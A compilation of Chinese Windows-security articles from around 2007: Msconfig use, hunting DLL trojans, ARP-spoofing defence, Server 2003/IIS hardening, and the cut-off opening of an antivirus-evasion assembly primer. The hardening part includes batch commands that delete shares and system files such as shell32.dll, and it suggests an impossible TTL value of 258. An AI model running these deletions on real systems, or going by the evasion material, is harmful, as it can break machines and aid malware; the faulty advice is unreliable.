以系统管理员身份登录系统后,单击“开始→运行”输入“Msconfig”回车后即可启动系统配置实用程序(图1)。下面笔者就结合几个应用实例来详细介绍Msconfig的使用(以WinXP为例)。
一般选择项,其实里面另有乾坤
“一般”选项不一般
1.选择启动方式
默认情况下,Windows采用的是正常启动模式(即加载所有驱动和系统服务),但是有时候由于设备驱动程序遭到破坏或服务故障,常常会导致启动出现一些问题,这时可以利用Msconfig的其它启动模式来解决问题。单击 “一般”选项,在“启动模式”选择“诊断启动”(图2),这种启动模式有助于我们快速找到启动故障原因。此外,还可以选择“有选择的启动模式”,按提示勾选需要启动项目的即可。
诊断启动方式仅仅加载基本的驱动与服务
小提示:诊断启动是指系统启动时仅加载基本设备驱动程序如显卡驱动,而不加载Modem、网卡等设备,服务也仅是系统必须的一些服务。这时系统是最干净的,如果启动没有问题,可以依次加载设备和服务来判断问题出在哪里。
2.从安装光盘提取丢失系统文件
虽然WinXP具备强大的文件保护功能,不过有时候由于安装/卸载软件或误操作,还是经常会造成系统文件的丢失。一般重要的系统文件,在系统安装光盘CAB文件中都可以找到。单击上图“展开文件”按钮,在弹出窗口中设置要还原文件、还原位置、保存文件到(选择保存文件路径,WinXP/2000一般为c:\windows\system32,Win98则为c:\windows\system),最后单击“展开”(图3),系统会自动解压CAB文件,将系统文件从安装光盘提取到电脑。
从安装盘抽取文件到系统
小知识:
可以先用系统的SFC命令来扫描系统文件的改动,找出变化的系统文件,命令格式:SFC [/SCANNOW] [/SCANONCE] [/SCANBOOT] [/REVERT] [/PURGECACHE] [/CACHESIZE=x]
/SCANNOW:立即扫描所有受保护的系统文件。
/SCANONCE:下次启动时扫描所有受保护的系统文件。
/SCANBOOT:每次启动时扫描所有受保护的系统文件。
/REVERT:将扫描返回到默认设置。
/PURGECACHE:清除文件缓存。
/CACHESIZE=x:设置文件缓存大小。
查看System.ini和Win.ini文件
System.ini包含整个系统的信息,是存放Windows启动时所需要的重要配置信息的文件。Win.ini则控制Windows用户窗口环境的概貌(如窗口边界宽度、加载系统字体等)。通过 Msconfig可以快速地查看和编辑这两个INI文件,如单击主界面的“Win.ini”文件,可以看到该文件的详细内容(图4),如果要禁止某一选项的加载,只要选中目标后单击“禁用”即可;同理,选中目标后单击“编辑”可以对该项目进行编辑操作(单击退格键可以删除该项目)。SYSTEM.INI的操作同上。
这里存放着系统重要的信息
小提示:因为这两个文件项目会在系统启动时被加载,所以一些木马也常常混迹其中,比如在Win.ini文件中发现诸如“Load=某程序”、“Run=某程序”的语句,这时可以用Msconfig的“编辑”功能将其删除。
轻松管理多重启动
在Windows NT类的操作系统(Windows NT/2000/XP/2003)中,都有一个特殊文件 “Boot.ini”,它可以管理多操作系统启动,但是它默认具有隐藏、系统、只读属性。要查看和编辑它,需要打开我的电脑,单击“工具→文件夹选项→查看→高级设置”,将文件夹视图设置为“显示所有文件和文件夹”,同时去除“隐藏受保护的操作系统文件”前的小钩,最后还要去除它的“只读”属性。
现在利用Msconfig操作就简捷多了。比如笔者安装的是WinXP+Windows 98双系统,默认启动系统是WinXP,等待时间是30秒,现在想把默认启动系统更改为Windows 98、等待时间缩短为10秒。单击主界面的“BOOT.INI”,选中“C:\Microsoft windows98”这一行,单击“设为默认”,然后将“超时”的时间设置为10秒(图5),最后单击确定重启后即可生效。这样无需进行其它操作,在Msconfig中即能轻松实现对该文件的编辑。
多重启动的菜单项就是这里控制的
Boot.ini是系统启动的关键文件,修改不当可能会导致系统无法启动,修改前建议做好文件的备份,修改后单击图5的“检查所有启动路径”检测一下文件。
清清楚楚看服务
大家知道很多系统服务会随Windows一起启动,而一些软件也常常把自己的一些组件注册为系统服务,特别是一些病毒/木马注册为系统服务后,它们常常躲在后台“为非作歹”,而且不容易被察觉。
如何查看系统已经运行和其它软件注册了的服务呢?单击主界面的“服务”,Msconfig会列出系统所有的服务,在“基本”选项还可以查看到该服务是否是系统的基本服务,通过“制造商”、“状态”可以知道服务提供商和运行状态(图6)。
这里可以看到服务提供商和运行状态
要启动停止的服务,在服务名前打上小钩即可启动。勾选“隐藏所有Microsoft服务”,此时列出的就是其它软件注册的系统服务(图7),通过“制造商”大体可以判断出服务是否是病毒/木马,如笔者电脑上的“Norton Antivirus自动防护服务”,制造商为“Symantec Corporation”(赛门特克公司),就是诺顿杀毒软件注册的服务,而“YZW”这个服务则极为可疑,经检查它正是一个木马。
可以禁用不需要的服务
小提示:要查看服务的详细说明,在桌面右击“我的电脑”,选择“管理”,在弹出窗口依次展开“计算机管理(本地)/应用程序和服务/服务”,即可在右侧窗口看到所有服务及详细描述。
管理自启动程序
自启动程序是随Windows一起启动的各种程序,它们开机后即可被自动加载(一些病毒、木马也常常搭自启动“便车”危害系统)。在Windows中加载自启动程序的地方有很多,如“Documents and Settings/All Users /「开始」菜单/程序”目录下的启动文件夹、注册表键值 如[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]等。
网上介绍过许多专门管理自启动程序的软件,其实Msconfig的自启动管理功能并不比这些软件差。单击主界面的“启动”便可列出电脑所有的自启动项目(图8),这里列出启动项目名称、程序所在路径和启动位置,对于加载在注册表启动的程序,它还给出了详细的键值提示而无需打开注册表编辑器,如C:\WINDOWS\System32\ctfmon.exe (系统输入法程序),它便是通过HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run这个键值来实现自启动的。
系统启动也由你一手控制
对于异常的自启动程序如木马等,可以通过Msconfig的提示路径来进行查杀。
QQ繁体字 V1.9
| 软件大小: | 501 K |
| 软件语言: | 简体中文 |
| 软件类型: | 国产软件 |
| 运行环境: | Win9x/NT/2000/XP/2003 |
| 添加时间: | 2007-8-4 17:20:48 |
| 软件评级: | ★★★ |
| 授权方式: | 免费版 |
| 开 发 商: | 佚名 |
| 软件添加: | 水土不服 |
| 软件介绍: |
是否习惯了在QQ中用简体字与朋友聊天?试试这个,自动将你输入的简体转换为繁体。让你与朋友交流的时候多一种选择。 |
| 下载地址: |
| 请使用迅雷下载 QQ繁体字 V1.9 点击下载=>[山东电信] 点击下载=>[山东网通] 点击下载=>[浙江电信] 点击下载=>[河南网通] 点击下载=>[河南电信] |
QQ空间个性回帖器 更新版
| 软件大小: | 998 K |
| 软件语言: | 简体中文 |
| 软件类型: | 国产软件 |
| 运行环境: | Win9x/NT/2000/XP/2003 |
| 添加时间: | 2007-8-22 18:10:38 |
| 软件评级: | ★★★ |
| 授权方式: | 免费版 |
| 开 发 商: | 许云风 |
| 软件添加: | 水土不服 |
| 软件介绍: 这次添加了预览效果 |
|
请使用迅雷下载 QQ空间个性回帖器 更新版
点击下载=>[山东电信]
点击下载=>[山东网通]
点击下载=>[浙江电信]
点击下载=>[河南网通]
点击下载=>[河南电信]
推荐:黑客教你如何利用Excel剿灭DLL木马
第一步:查找被感染的进程
近日开机上网一段时间后就觉得网速特别的慢,于是便运行“netstat -a -n -o”查看开放的端口和连接,其中进程PID为580发起的连接极为可疑:状态为ESTABLISHED,表示两台机器正在通信(见图1)。通过任务管理器可以知道这个进程为lsass.exe,根据进程的解释,lsass.exe是用于微软Windows系统的安全机制,它用于本地安全和登陆策略,显然这个进程是不需要开放端口和外部连接的,据此判断该进程极可能插入DLL木马。如果牧马者当前没有进行连接,还可以通过端口状态判断是否中招,如TIME_WAIT的意思是结束了这次连接,说明端口曾经有过访问,但访问结束了,表明已经有黑客入侵过本机。LISTENING表示处于侦听状态,等待连接,但还没有被连接,不过只有TCP协议的服务端口才能处于LISTENING状态。
小提示:判断是否中招的前提是要找出被感染的进程,按被插入进程的类别分,DLL木马大致可以分为:
1.插入常用进程,如Notepad.exe、Iexplorer.exe(此类木马的判断很简单,开机后不启动任何程序,打开任务管理器如果发现上述进程,那就可以判断中招了)。
2.插入系统进程,如Explorer.exe、lsass.exe(由于每台电脑开机后都有上述的进程,具体可以通过查看端口和进程本身特性加以判断,比如本机的lsass.exe、winlogon.exe、explorer.exe就不会开放端口连接)。
3.对于插入本身就开放端口进程如alg.exe、svchost.exe,需要通过连接状况、连接IP、调用DLL综合加以判断。
第二步:追查木马真凶
知道被插入DLL木马的进程,我们就可以通过比较进程调用的DLL模块来甑别。
1.到其它正常电脑上启动命令提示符运行“tasklist /m /fo list >G:\dll1.txt”,将当前进程加载所有DLL文件以列表形式输出,然后打开dll.txt并复制lsass.exe加载的DLL文件列表(见图2)。
2..打开Excel,将正常电脑和中招电脑lsass.exe加载的DLL文件复制到A、B列,由于Excel有序号,通过序号就可以轻易发现两个lsass.exe加载的DLL文件数量不同(64和68)。现在将B列字体设置为红色,剪切B列内容并粘贴到A列,单击Excel的“数据/排序”,将数据重新排序后,木马文件就在连续红色但和上格不相同的DLL文件中,分别是mswsock.dll、PSAPI.DLL、wshtcpip.dll、share.dll(见图3)。
小提示:
如果无法确定哪个进程被插入木马,可以先输出所有DLL文件,然后在Excel中排序和正常状态DLL文件比较,依次找出新增的DLL文件一一排查。
第三步:删除木马文件
从上可以知道DLL木马就在上述多出的4个文件中,现在通过搜索功能找到这些文件(DLL文件大多在系统目录,搜索范围可限制在此),并通过查看属性最终找到真凶为c:\windows\system32\share.dll。现在进入安全模式将share.dll删除,然后根据它的创建时间、大小找到木马的同伙并删除。一般微软系统DLL文件都有版本标签,而且文件日期大多是一样的,可以通过这些属性判断。
小提示:对于插入notepad、IE、explorer.exe等进程的dll木马,可以将进程终止后直接删除dll木马。
第四步:做好备份,防患于未然
相对来说,本例被插入木马的系统进程比较容易判断,但是对插入系统本身就开放端口的进程如svchost.exe,判断起来就比较困难。因此我们平时要用Tasklist命令做好常见系统进程DLL文件备份,这样就可以在怀疑自己中招时,重启并关闭任何无关程序,然后通过Excel排序快速找到木马真凶!
注意:系统有多个svchost.exe进程,但是它们进程pid是不同的,需要分开备份。
推荐:让您轻松无忧 防治arp攻击
防治ARP攻击,哪种方式让您轻松无忧?由于最近ARP欺骗/攻击反反复复,而市场上的各种防制方式让广大读者应接不暇,如何才能有效防制ARP,是今天我们所有技术人员都要应对的问题。最近一些方案,从短期看来似乎有效,实际上对于真正的ARP攻击发挥不了作用,也降低局域网工作效率。Qno的技术服务人员接到很多用户反应说有些ARP防制方法很容易操作和实施,但经过实际深入了解后,发现长期效果都不大。
对于ARP攻击防制,Qno技术服务人员的建议,最好的方法是先踏踏实实把基本防制工作做好,才是根本解决的方法。由于市场上的解决方式众多,我们无法一一加以说明优劣,因此本文解释了ARP攻击防制的基本思想。我们认为读者如果能了解这个基本思想,就能自行判断何种防制方式有效,也能了解为何双向绑定是一个较全面又持久的解决方式。
一、不坚定的ARP协议
一般计算机中的原始的ARP协议,很像一个思想不坚定,容易被其它人影响的人,ARP欺骗/攻击就是利用这个特性,误导计算机作出错误的行为。ARP攻击的原理,互联网上很容易找到,这里不再覆述。原始的ARP协议运作,会附在局域网接收的广播包或是ARP询问包,无条件覆盖本机缓存中的ARP/MAC对照表。这个特性好比一个意志不坚定的人,听了每一个人和他说话都信以为真,并立刻以最新听到的信息作决定。
就像一个没有计划的快递员,想要送信给“张三”,只在马路上问“张三住那儿?”,并投递给最近和他说“我就是!”或“张三住那间!”,来决定如何投递一样。在一个人人诚实的地方,快递员的工作还是能切实地进行;但若是旁人看快递物品值钱,想要欺骗取得的话,快递员这种工作方式就会带来混乱了。
我们再回来看ARP攻击和这个意志不坚定快递员的关系。常见ARP攻击对象有两种,一是网络网关,也就是路由器,二是局域网上的计算机,也就是一般用户。攻击网络网关就好比发送错误的地址信息给快递员,让快递员整个工作大乱,所有信件无法正常送达;而攻击一般计算机就是直接和一般人谎称自己就是快递员,让一般用户把需要传送物品传送给发动攻击的计算机。
由于一般的计算机及路由器的ARP协议的意志都不坚定,因此只要有恶意计算机在局域网持续发出错误的ARP讯息,就会让计算机及路由器信以为真,作出错误的传送网络包动作。一般的ARP就是以这样的方式,造成网络运作不正常,达到盗取用户密码或破坏网络运作的目的。针对ARP攻击的防制,常见的方法,可以分为以下三种作法:
1、利用ARP echo传送正确的ARP讯息:通过频繁地提醒正确的ARP对照表,来达到防制的效果。
2、利用绑定方式,固定ARP对照表不受外来影响:通过固定正确的ARP对照表,来达到防制的效果。
3、舍弃ARP协议,采用其它寻址协议:不采用ARP作为传送的机制,而另行使用其它协议例如PPPoE方式传送。
以上三种方法中,前两种方法较为常见,第三种方法由于变动较大,适用于技术能力较佳的应用。下面针对前两种方法加以说明。
PK 赛之“ARP echo”
ARP echo是最早开发出来的ARP攻击解决方案,但随着ARP攻击的发展,渐渐失去它的效果。现在,这个方法不但面对攻击没有防制效果,还会降低局域网运作的效能,但是很多用户仍然以这个方法来进行防制。以前面介绍的思想不坚定的快递员的例子来说,ARP echo的作法,等于是时时用电话提醒快递员正确的发送对象及地址,减低他被邻近的各种信息干扰的情况。
但是这种作法,明显有几个问题:第一,即使时时提醒,但由于快递员意志不坚定,仍会有部份的信件因为要发出时刚好收到错误的信息,以错误的方式送出去;这种情况如果是错误的信息频率特高,例如有一个人时时在快递员身边连续提供信息,即使打电话提醒也立刻被覆盖,效果就不好;第二,由于必须时时提醒,而且为了保证提醒的效果好,还要加大提醒的间隔时间,以防止被覆盖,就好比快递员一直忙于接听总部打来的电话,根本就没有时间可以发送信件,耽误了正事;第三,还要专门指派一位人时时打电话给快递员提醒,等于要多派一个人手负责,而且持续地提醒,这个人的工作也很繁重。
以ARP echo方式对应ARP攻击,也会发生相似的情况。第一,面对高频率的新式ARP攻击,ARP echo发挥不了效果,掉线断网的情况仍旧会发生。ARP echo的方式防制的对早期以盗宝为目的的攻击软件有效果,但碰到最近以攻击为手段的攻击软件则公认是没有效果的。第二,ARP echo手段必须在局域网上持续发出广播网络包,占用局域网带宽,使得局域网工作的能力降低,整个局域网的计算机及交换机时时都在处理ARP echo广播包,还没受到攻击局域网就开始卡了。第三,必须在局域网有一台负责负责发ARP echo广播包的设备,不管是路由器、服务器或是计算机,由于发包是以一秒数以百计的方式来发送,对该设备都是很大的负担。
图一:ARP攻击防制 方法之“ARP echo”图示说明常见的ARP echo处理手法有两种,一种是由路由器持续发送,另一则是在计算机或服务器安装软件发送。路由器持续发送的缺点是路由器原本的工作就很忙,因此无法发送高频率的广播包,被覆盖掉的机会很大,因此面对新型的ARP攻击防制效果小。因此,有些解决方法,就是拿ARP攻击的软件来用,只是持续发出正确的网关、服务器对照表,安装在服务器或是计算机上,由于服务器或是计算机运算能力较强,可以同一时间内发出更多广播包,效果较大,但是这种作法一则大幅影响局域网工作,因为整个局域网都被广播包占据,另则攻击软件通常会设定更高频率的广播包,误导局域网计算机,效果仍然有限。
此外,ARP echo一般是发送网关及私服的对照信息,对于防止局域网计算机被骗有效果,对于路由器没有效果,仍需作绑定的动作才可。
PK赛之“ARP绑定”
ARP echo的作法是不断提醒计算机正确的ARP对照表,ARP绑定则是针对ARP协议“思想不坚定“的基本问题来加以解决。ARP绑定的作法,等于是从基本上给这个快递员培训,让他把正确的人名及地址记下来,再也不受其它人的信息干扰。由于快递员脑中记住了这个对照表,因此完全不会受到有心人士的干扰,能有效地完成工作。在这种情况下,无论如何都可以防止因受到攻击而掉线的情况发生。
但是ARP绑定并不是万灵药,还需要作的好才有完全的效果。第一,即使这个快递员思想正确,不受影响,但是攻击者的网络包还是会小幅影响局域网部份运作,网管必须通过网络监控或扫瞄的方法,找出攻击者加以去除;第二,必须作双向绑定才有完全的效果,只作路由器端绑定效果有限,一般计算机仍会被欺骗,而发生掉包或掉线的情况。
双向绑定的解决方法,最为网管不喜欢的就是必须一台一台加以绑定,增加工作量。但是从以上的说明可知道,只有双向绑定才能有效果地解决ARP攻击的问题,而不会发生防制效果不佳、局域网效率受影响、影响路由器效能或影响服务器效能的缺点。也就是说双向绑定是个硬工夫,可以较全面性地解决现在及未来ARP攻击的问题,网管为了一时的省事,而采取片面的ARP echo解决方式,未来还是要回来解决这个问题。
图二:ARP攻击防制 方法之侠诺“ARP双向绑定”图示说明另外,对于有自动通过局域网安装软件的网络,例如网吧的收费系统、无盘系统,都可以透过自动的批次档,自动在开机时完成绑定的工作,网管只要撰写一个统一的批次文件程序即可,不必一一配置。
二、现阶段较佳解决方案——双向绑定
以上以思想不坚定的快递员情况,说明了常见的ARP攻击防制方法。ARP攻击利用的就是ARP协议的意志不坚,只有以培训的方式让ARP协议的意志坚定,明白正确的工作方法,才能从根本解决问题。只是依赖频繁的提醒快递员正确的作事方法,但是没有能从快递员意志不坚的特点着手,就好像只管不教,最终大家都很累,但是效果仍有限。
面对这种新兴攻击,取巧用省事的方式准备,最后的结果可能是费事又不管用,必须重新来过。ARP双向绑定虽然对网管带来一定的工作量,但是其效果确是从根本上有效,而且网管也可参考自动批次档的作法,加快配置自动化的进行,更有效地对抗ARP攻击。
检测计算机真实性能 微软官方评估工具
Windows Vista Hardware Assessment是一个使用WMI(Windows Management Instrumentation)发现网络中计算机并产生详细清单的工具.通过得到的数据,该工具将评估、报告这些计算机是否可以运行Windows Vista,并发现计算机设备的驱动程序,提供硬件升级建议.显然,这个工具很适合管理着大量计算机的企业网络管理员,如果要升级到Vista,这款工具不可缺少.
Windows Vista Hardware Assessment不需要被评估和列表的计算机上安装代理程序,可以快速、简单断定网络中计算机是否适合安装Vista.Windows Vista Hardware Assessment可以提供有关硬件和设备在Windows Vista下兼容性的详细分析,以及检查兼容性数据更新.
此外,Windows Vista Hardware Assessment还可让用户了解哪些硬件设备在Windows Vista安装光盘中已提供了设备驱动程序,哪些驱动程序未提供但可从Windows Update下载等.
Server2003 防木马权限设置IIS服务器安全配置
参考了网络上很多关于WIN2003的安全设置以及自己动手做了一些实践,综合了这些安全设置文章整理而成,希望对大家有所帮助,另外里面有不足之处还请大家多多指点,然后给补上,谢谢!
一、系统的安装
1、按照Windows2003安装光盘的提示安装,默认情况下2003没有把IIS6.0安装在系统里面。
2、IIS6.0的安装
开始菜单—>控制面板—>添加或删除程序—>添加/删除Windows组件
应用程序 ———ASP.NET(可选)
|——启用网络 COM+ 访问(必选)
|——Internet 信息服务(IIS)———Internet 信息服务管理器(必选)
|——公用文件(必选)
|——万维网服务———Active Server pages(必选)
|——Internet 数据连接器(可选)
|——WebDAV 发布(可选)
|——万维网服务(必选)
|——在服务器端的包含文件(可选)
然后点击确定—>下一步安装。(具体见本文附件1)
3、系统补丁的更新
点击开始菜单—>所有程序—>Windows Update
按照提示进行补丁的安装。
4、备份系统
用GHOST备份系统。
5、安装常用的软件
例如:杀毒软件、解压缩软件等;安装完毕后,配置杀毒软件,扫描系统漏洞,安装之后用GHOST再次备份系统。
6、先关闭不需要的端口 开启防火墙 导入IPSEC策略
在”网络连接”里,把不需要的协议和服务都删掉,这里只安装了基本的Internet协议(TCP/IP),由于要控制带宽流量服务,额外安装了Qos数据包计划程序。在高级tcp/ip设置里--"NetBIOS"设置"禁用tcp/IP上的NetBIOS(S)"。在高级选项里,使用"Internet连接防火墙",这是windows 2003 自带的防火墙,在2000系统里没有的功能,虽然没什么功能,但可以屏蔽端口,这样已经基本达到了一个IPSec的功能。
修改3389远程连接端口
修改注册表.
开始--运行--regedit
依次展开 HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/
TERMINAL SERVER/WDS/RDPWD/TDS/TCP
右边键值中 PortNumber 改为你想用的端口号.注意使用十进制(例 10000 )
HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/
WINSTATIONS/RDP-TCP/
右边键值中 PortNumber 改为你想用的端口号.注意使用十进制(例 10000 )
注意:别忘了在WINDOWS2003自带的防火墙给+上10000端口
修改完毕.重新启动服务器.设置生效.
二、用户安全设置
1、禁用Guest账号
在计算机管理的用户里面把Guest账号禁用。为了保险起见,最好给Guest加一个复杂的密码。你可以打开记事本,在里面输入一串包含特殊字符、数字、字母的长字符串,然后把它作为Guest用户的密码拷进去。
2、限制不必要的用户
去掉所有的Duplicate User用户、测试用户、共享用户等等。用户组策略设置相应权限,并且经常检查系统的用户,删除已经不再使用的用户。这些用户很多时候都是黑客们入侵系统的突破口。
3、把系统Administrator账号改名
大家都知道,Windows 2003 的Administrator用户是不能被停用的,这意味着别人可以一遍又一遍地尝试这个用户的密码。尽量把它伪装成普通用户,比如改成Guesycludx。
4、创建一个陷阱用户
什么是陷阱用户?即创建一个名为“Administrator”的本地用户,把它的权限设置成最低,什么事也干不了的那种,并且加上一个超过10位的超级复杂密码。这样可以让那些 Hacker们忙上一段时间,借此发现它们的入侵企图。
5、把共享文件的权限从Everyone组改成授权用户
任何时候都不要把共享文件的用户设置成“Everyone”组,包括打印共享,默认的属性就是“Everyone”组的,一定不要忘了改。
6、开启用户策略
使用用户策略,分别设置复位用户锁定计数器时间为20分钟,用户锁定时间为20分钟,用户锁定阈值为3次。 (该项为可选)
7、不让系统显示上次登录的用户名
默认情况下,登录对话框中会显示上次登录的用户名。这使得别人可以很容易地得到系统的一些用户名,进而做密码猜测。修改注册表可以不让对话框里显示上次登录的用户名。方法为:打开注册表编辑器并找到注册表“HKLM\Software\Microsoft\Windows T\CurrentVersion\Winlogon\Dont-DisplayLastUserName”,把REG_SZ的键值改成1。
密码安全设置
1、使用安全密码
一些公司的管理员创建账号的时候往往用公司名、计算机名做用户名,然后又把这些用户的密码设置得太简单,比如“welcome”等等。因此,要注意密码的复杂性,还要记住经常改密码。
2、设置屏幕保护密码
这是一个很简单也很有必要的操作。设置屏幕保护密码也是防止内部人员破坏服务器的一个屏障。
3、开启密码策略
注意应用密码策略,如启用密码复杂性要求,设置密码长度最小值为6位 ,设置强制密码历史为5次,时间为42天。
4、考虑使用智能卡来代替密码
对于密码,总是使安全管理员进退两难,密码设置简单容易受到黑客的攻击,密码设置复杂又容易忘记。如果条件允许,用智能卡来代替复杂的密码是一个很好的解决方法。
三、系统权限的设置
1、磁盘权限
系统盘及所有磁盘只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Documents and Settings 目录只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Documents and Settings\All Users 目录只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Windows\System32\cacls.exe、cmd.exe、net.exe、net1.exe、ftp.exe、tftp.exe、telnet.exe 、 netstat.exe、regedit.exe、at.exe、attrib.exe、format.com、del文件只给 Administrators 组和SYSTEM 的完全 控制权限
另将<systemroot>\System32\cmd.exe、format.com、ftp.exe转移到其他目录或更名
Documents and Settings下所有些目录都设置只给adinistrators权限。并且要一个一个目录查看,包括下面的所有子目录。
删除c:\inetpub目录
2、本地安全策略设置
开始菜单—>管理工具—>本地安全策略
A、本地策略——>审核策略
审核策略更改 成功 失败
审核登录事件 成功 失败
审核对象访问 失败
审核过程跟踪 无审核
审核目录服务访问 失败
审核特权使用 失败
审核系统事件 成功 失败
审核账户登录事件 成功 失败
审核账户管理 成功 失败
B、本地策略——>用户权限分配
关闭系统:只有Administrators组、其它全部删除。
通过终端服务允许登陆:只加入Administrators,Remote Desktop Users组,其他全部删除
C、本地策略——>安全选项
交互式登陆:不显示上次的用户名 启用
网络访问:不允许SAM帐户和共享的匿名枚举 启用
网络访问:不允许为网络身份验证储存凭证 启用
网络访问:可匿名访问的共享 全部删除
网络访问:可匿名访问的命 全部删除
网络访问:可远程访问的注册表路径 全部删除
网络访问:可远程访问的注册表路径和子路径 全部删除
帐户:重命名来宾帐户 重命名一个帐户
帐户:重命名系统管理员帐户 重命名一个帐户
3、禁用不必要的服务 开始-运行-services.msc
TCP/IPNetBIOS Helper提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持而使用户能够共享
文件、打印和登录到网络
Server支持此计算机通过网络的文件、打印、和命名管道共享
Computer Browser 维护网络上计算机的最新列表以及提供这个列表
Task scheduler 允许程序在指定时间运行
Messenger 传输客户端和服务器之间的 NET SEND 和 警报器服务消息
Distributed File System: 局域网管理共享文件,不需要可禁用
Distributed linktracking client:用于局域网更新连接信息,不需要可禁用
Error reporting service:禁止发送错误报告
Microsoft Serch:提供快速的单词搜索,不需要可禁用
NTLMSecuritysupportprovide:telnet服务和Microsoft Serch用的,不需要可禁用
PrintSpooler:如果没有打印机可禁用
Remote Registry:禁止远程修改注册表
Remote Desktop Help Session Manager:禁止远程协助
Workstation 关闭的话远程NET命令列不出用户组
以上是在Windows Server 2003 系统上面默认启动的服务中禁用的,默认禁用的服务如没特别需要的话不要启动。
4、修改注册表
修改注册表,让系统更强壮
1、隐藏重要文件/目录可以修改注册表实现完全隐藏
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ Current-Version\Explorer\Advanced\Folder\Hi-dden\SHOWALL”,鼠标右击 “CheckedValue”,选择修改,把数值由1改为0
2、防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建DWORD值,名为SynAttackProtect,值为2
新建EnablePMTUDiscovery REG_DWORD 0
新建NoNameReleaseOnDemand REG_DWORD 1
新建EnableDeadGWDetect REG_DWORD 0
新建KeepAliveTime REG_DWORD 300,000
新建PerformRouterDiscovery REG_DWORD 0
新建EnableICMPRedirects REG_DWORD 0
3. 禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\interface
新建DWORD值,名为PerformRouterDiscovery 值为0
4. 防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
将EnableICMPRedirects 值设为0
5. 不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建DWORD值,名为IGMPLevel 值为0
6、禁止IPC空连接:
cracker可以利用net use命令建立空连接,进而入侵,还有net view,nbtstat这些都是基于空连接的,禁止空连接就好了。
Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 把这个值改成”1”即可。
7、更改TTL值
cracker可以根据ping回的TTL值来大致判断你的操作系统,如:
TTL=107(WINNT);
TTL=108(win2000);
TTL=127或128(win9x);
TTL=240或241(linux);
TTL=252(solaris);
TTL=240(Irix);
实际上你可以自己改的:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters:DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)改成一个莫名其妙的数字如258,起码让那些小菜鸟晕上半天,就此放弃入侵你也不一定哦
8. 删除默认共享
有人问过我一开机就共享所有盘,改回来以后,重启又变成了共享是怎么回事,这是2K为管理而设置的默认共享,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters:AutoShareServer类型是REG_DWORD把值改为0即可
9. 禁止建立空连接
默认情况下,任何用户通过通过空连接连上服务器,进而枚举出帐号,猜测密码。我们可以通过修改注册表来禁止建立空连接:
Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的值改成”1”即可。
10、建立一个记事本,填上以下代码。保存为*.bat并加到启动项目中
net share c$ /del
net share d$ /del
net share e$ /del
net share f$ /del
net share ipc$ /del
net share admin$ /del
5、IIS站点设置:
1、将IIS目录&数据与系统磁盘分开,保存在专用磁盘空间内。
2、启用父级路径
3、在IIS管理器中删除必须之外的任何没有用到的映射(保留asp等必要映射即可)
4、在IIS中将HTTP404 Object Not Found出错页面通过URL重定向到一个定制HTM文件
5、Web站点权限设定(建议)
读 允许
写 不允许
脚本源访问 不允许
目录浏览 建议关闭
日志访问 建议关闭
索引资源 建议关闭
执行 推荐选择 “仅限于脚本”
6、建议使用W3C扩充日志文件格式,每天记录客户IP地址,用户名,服务器端口,方法,URI字根,HTTP状态,用户代理,而且每天均要审查日志。(最好不要使用缺省的目录,建议更换一个记日志的路径,同时设置日志的访问权限,只允许管理员和system为Full Control)。
7、程序安全:
1) 涉及用户名与口令的程序最好封装在服务器端,尽量少的在ASP文件里出现,涉及到与数据库连接地用户名与口令应给予最小的权限;
2) 需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。
3) 防止ASP主页.inc文件泄露问题;
4) 防止UE等编辑器生成some.asp.bak文件泄露问题。
6、IIS权限设置的思路
?要为每个独立的要保护的个体(比如一个网站或者一个虚拟目录)创建一个系统用户,让这个站点在系统中具有惟一的可以设置权限的身份。
?在IIS的【站点属性或者虚拟目录属性→目录安全性→匿名访问和验证控制→编辑→匿名访问→编辑】填写刚刚创建的那个用户名。
?设置所有的分区禁止这个用户访问,而刚才这个站点的主目录对应的那个文件夹设置允许这个用户访问(要去掉继承父权限,并且要加上超管组和SYSTEM组)。
7、卸载最不安全的组件
最简单的办法是直接卸载后删除相应的程序文件。将下面的代码保存为一个.BAT文件,( 以下均以 WIN2000 为例,如果使用2003,则系统文件夹应该是 C:\WINDOWS\ )
regsvr32/u C:\WINDOWS\System32\wshom.ocx
del C:\WINDOWS\System32\wshom.ocx
regsvr32/u C:\WINDOWS\system32\shell32.dll
del C:\WINNT\WINDOWS\shell32.dll
然后运行一下,WScript.Shell, Shell.application, WScript.Network就会被卸载了。可能会提示无法删除文件,不用管它,重启一下服务器,你会发现这三个都提示“×安全”了。
汇编”免杀”基础知识总结说明
一.机械码,又称机器码.
ultraedit打开,编辑exe文件时你会看到
许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码,这些数码
就是机器码.
修改程序时必须通过修改机器码来修改exe文件.
二.需要熟练掌握的全部汇编知识(只有这么多)
不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了
cmp a,b 比较a与b
mov a,b 把b的值送给a
ret 返回主程序
nop 无作用,英文“no operation”的简写,意思是“do nothing”(机器码90)***机器码的含义参看上面
(解释:ultraedit打开编辑exe文件时你看到90,等同于汇编语句nop)
call 调用子程序
